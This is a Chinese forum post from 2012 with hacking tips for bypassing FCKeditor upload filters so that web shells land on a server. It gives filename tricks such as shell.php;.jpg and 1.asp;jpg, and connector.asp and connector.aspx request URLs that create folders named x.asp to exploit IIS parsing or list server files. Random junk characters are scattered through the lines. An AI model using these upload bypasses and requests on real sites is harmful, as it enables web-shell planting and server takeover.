很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg& o; U1 t4 e8 y% q% d- V; K1 U$ e6 P
* o! Q; x2 u$ v6 g- a" U提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。* c8 Z* v7 a) \1 [1 e1 W: z8 S: G8 k7 ]
" B8 t% ^8 P/ B9 k/ H' Q
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
. _; c1 h: T' f Q
( }8 l) S4 Q: H1 ]/ W) G突破建立文件夹: D* N! ~6 e8 w6 u
, f- V( C. P8 p
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp4 `' R6 F* ]# k7 ^4 h' E
! j: X- M+ B: v/ X4 i! j
参数:
! h4 {& T8 x, H% ~" D. |. R
* p# |6 r1 v- B8 t. @当前目录名:CurrentFolder=/qing.asp
6 I) c" p2 i) f `: K/ D) H# y0 q# c
新的目录名:NewFolderName=x.asp
$ {' S! g; z* [8 _- Q" s( r; ?# t' w
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……4 P j* P/ y) i. K
" `, ~/ w5 H4 u那么 x.asp 就已经建立生成了,此方法百试百灵!
& ?, {) I% `! W' k% T
; y) o4 F* N3 r0 s8 k4 }2 z新建文件夹参数 x.asp,基本都能搞定。% q: ]4 ^. q( f% c
# Y- w- I) ^! v* A3 x7 Y* k
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建! D: G l5 Y3 n& `( O
! o, D2 {) h4 J' ~' T
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
* o+ z. O& P1 u( H( _8 o: J
5 W) P% C0 I$ t8 F获取文件列表8 C8 i" P% m' N4 ^
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
+ R$ y* Y( I; I0 Z
4 s4 ^8 ?, R! r% O |
发表于 2012-12-31 09:27:09
收藏
支持
反对